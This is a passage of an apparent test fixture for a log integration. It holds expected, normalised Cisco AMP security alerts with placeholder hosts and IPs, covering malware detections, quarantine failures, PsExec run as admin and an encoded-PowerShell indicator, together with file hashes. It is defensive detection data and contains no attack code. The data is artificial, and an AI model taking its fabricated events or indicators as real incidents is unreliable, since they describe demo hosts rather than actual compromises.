+            "@timestamp": "2021-01-14T10:01:51.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_BP_WMIPRVSE"
+                ],
+                "hash": [
+                    "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_BP_WMIPRVSE",
+                "hostname": "Demo_BP_WMIPRVSE"
+            },
+            "event": {
+                "severity": 2,
+                "action": "Quarantine Failure",
+                "ingested": "2021-09-12T17:32:35.701370740Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
+                "id": "6880587034675643000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "be:b0:d5:89:e2:96",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Unknown",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "be:b0:d5:89:e2:96"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object path not found",
+                        "error_code": 3221225530
+                    },
+                    "detection_id": "6880587034675642558",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "csc.exe",
+                "pid": 6708,
+                "hash": {
+                    "sha1": "93cf877f5627e55ec076a656e935042fac39950e",
+                    "sha256": "4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57",
+                    "md5": "23ee3d381cfe3b9f6229483e2ce2f9e1"
+                }
+            },
+            "@timestamp": "2021-01-14T10:01:50.000Z",
+            "file": {
+                "name": "p3fci4nu.dll",
+                "path": "\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll",
+                "hash": {
+                    "sha256": "1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_BP_WMIPRVSE"
+                ],
+                "hash": [
+                    "1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_BP_WMIPRVSE",
+                "hostname": "Demo_BP_WMIPRVSE",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701372604Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587030380676000,\"timestamp\":1610618510,\"timestamp_nanoseconds\":737000000,\"date\":\"2021-01-14T10:01:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Generic.Malware.WX.9E93D282\",\"detection_id\":\"6880587021790740668\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"file_name\":\"p3fci4nu.dll\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\Temp\\\\p3fci4nu\\\\p3fci4nu.dll\",\"identity\":{\"sha256\":\"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48\"},\"parent\":{\"process_id\":6708,\"disposition\":\"Clean\",\"file_name\":\"csc.exe\",\"identity\":{\"sha256\":\"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57\",\"sha1\":\"93cf877f5627e55ec076a656e935042fac39950e\",\"md5\":\"23ee3d381cfe3b9f6229483e2ce2f9e1\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6880587030380676000",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "Generic.Malware.WX.9E93D282",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "be:b0:d5:89:e2:96",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Unknown",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "be:b0:d5:89:e2:96"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6880587021790740668",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"
+                }
+            },
+            "@timestamp": "2021-01-14T09:56:55.000Z",
+            "file": {
+                "name": "PsExec.exe",
+                "path": "file:///C%3A/share%24/PsExec.exe",
+                "hash": {
+                    "sha256": "3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_MAP_FriedEx"
+                ],
+                "hash": [
+                    "3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_MAP_FriedEx",
+                "hostname": "Demo_AMP_MAP_FriedEx"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701374528Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":460392585524661250,\"timestamp\":1610618215,\"timestamp_nanoseconds\":615000000,\"date\":\"2021-01-14T09:56:55+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618215,\"start_date\":\"2021-01-14T09:56:55+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The psexec utility was executed as admin.\",\"short_description\":\"W32.PsexecAsAdmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PsExec.exe\",\"file_path\":\"file:///C%3A/share%24/PsExec.exe\",\"identity\":{\"sha256\":\"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-14T09:56:55.000Z",
+                "action": "Cloud IOC",
+                "id": "460392585524661250",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "04:e6:4d:d5:7a:b5",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "04:e6:4d:d5:7a:b5"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.PsexecAsAdmin.ioc",
+                        "description": "The psexec utility was executed as admin."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T07:56:40.000Z",
+            "file": {
+                "name": "resume.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe",
+                "hash": {
+                    "sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b",
+                    "sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86",
+                    "md5": "41476df3138717868118d8542cf3d1d6"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP"
+                ],
+                "hash": [
+                    "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86",
+                    "41476df3138717868118d8542cf3d1d6",
+                    "5ca4bef8de6def53519d4b22632675bb4c1e470b"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_AMP",
+                "hostname": "Demo_AMP"
+            },
+            "event": {
+                "severity": 0,
+                "ingested": "2021-09-12T17:32:35.701376409Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610611000,\"timestamp_nanoseconds\":758406329,\"date\":\"2021-01-14T07:56:40+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}",
+                "kind": "alert",
+                "action": "File Fetch Completed",
+                "id": "6508191586038317000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "38:1e:eb:ba:2c:15",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "38:1e:eb:ba:2c:15"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648173
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"
+                }
+            },
+            "@timestamp": "2021-01-14T05:49:06.000Z",
+            "file": {
+                "name": "powershell.exe",
+                "path": "file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe",
+                "hash": {
+                    "sha256": "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_MAP_FriedEx"
+                ],
+                "hash": [
+                    "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_MAP_FriedEx",
+                "hostname": "Demo_AMP_MAP_FriedEx"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701378300Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136035192884000,\"timestamp\":1610603346,\"timestamp_nanoseconds\":403000000,\"date\":\"2021-01-14T05:49:06+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610603346,\"start_date\":\"2021-01-14T05:49:06+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-14T05:49:06.000Z",
+                "action": "Cloud IOC",
+                "id": "7007136035192884000",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "04:e6:4d:d5:7a:b5",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "04:e6:4d:d5:7a:b5"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.PowershellEncodedBuffer.ioc",
+                        "description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T00:37:44.000Z",
+            "file": {
+                "name": "resume.exe",
+                "hash": {
+                    "sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP"
+                ],
+                "hash": [
+                    "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP",
+                "hostname": "Demo_AMP"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:35.701380257Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515350231459808800,\"timestamp\":1610584664,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-14T00:37:44+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected in Low Prevalence Executable",
+                "id": "1515350231459808800",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "38:1e:eb:ba:2c:15",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "38:1e:eb:ba:2c:15"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 1107296278
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T00:27:10.000Z",
+            "file": {
+                "name": "resume.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe",
+                "hash": {
+                    "sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b",
+                    "sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86",
+                    "md5": "41476df3138717868118d8542cf3d1d6"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP"
+                ],
+                "hash": [
+                    "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86",
+                    "41476df3138717868118d8542cf3d1d6",
+                    "5ca4bef8de6def53519d4b22632675bb4c1e470b"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_AMP",
+                "hostname": "Demo_AMP"
+            },
+            "event": {
+                "severity": 0,
+                "ingested": "2021-09-12T17:32:35.701382106Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610584030,\"timestamp_nanoseconds\":579890366,\"date\":\"2021-01-14T00:27:10+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}",
+                "kind": "alert",
+                "action": "File Fetch Completed",
+                "id": "6508191586038317000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "38:1e:eb:ba:2c:15",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "38:1e:eb:ba:2c:15"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648173
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T00:02:08.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_MAP_FriedEx"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_MAP_FriedEx",
+                "hostname": "Demo_AMP_MAP_FriedEx"
+            },
+            "event": {
+                "severity": 0,
+                "action": "Policy Update",
+                "ingested": "2021-09-12T17:32:35.701383971Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583671182384431000,\"timestamp\":1610582528,\"timestamp_nanoseconds\":614000000,\"date\":\"2021-01-14T00:02:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
+                "id": "6583671182384431000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "04:e6:4d:d5:7a:b5",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "04:e6:4d:d5:7a:b5"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648130
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-13T15:36:52.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:35.701385864Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":695000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 